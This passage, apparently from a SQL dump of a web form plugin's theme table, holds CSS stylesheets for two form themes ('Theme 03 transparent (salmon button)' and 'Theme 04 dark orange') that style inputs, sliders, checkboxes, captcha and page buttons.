pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(12,'Theme 03 transparent (salmon button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8D6D7;\r\nborder: 1px solid #D8D6D7;\r\nmargin-bottom: 10px;\r\ncolor: #D8D6D7;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\nbackground: #FA8072;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #FFABA1;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #FF9689;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #ECECEC;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #FF9A8E;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #FA8072;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF8F83; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F7B4AC), color-stop(39%, #F89F95), color-stop(100%, #FF8F83)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/04/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(13,'Theme 04 dark orange','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #F6CE9D;\r\nmargin-bottom: 10px;\r\ncolor: #F6CE9D;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #424242 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 